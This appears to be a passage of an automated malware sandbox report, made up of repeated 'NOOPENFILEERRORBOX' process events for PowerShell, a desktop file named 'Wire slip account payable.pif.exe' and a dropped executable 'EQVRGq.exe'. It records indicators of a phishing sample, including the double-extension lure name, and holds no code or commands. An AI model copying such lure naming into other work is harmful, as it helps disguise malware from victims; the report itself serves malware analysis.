                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess information set: NOOPENFILEERRORBOX
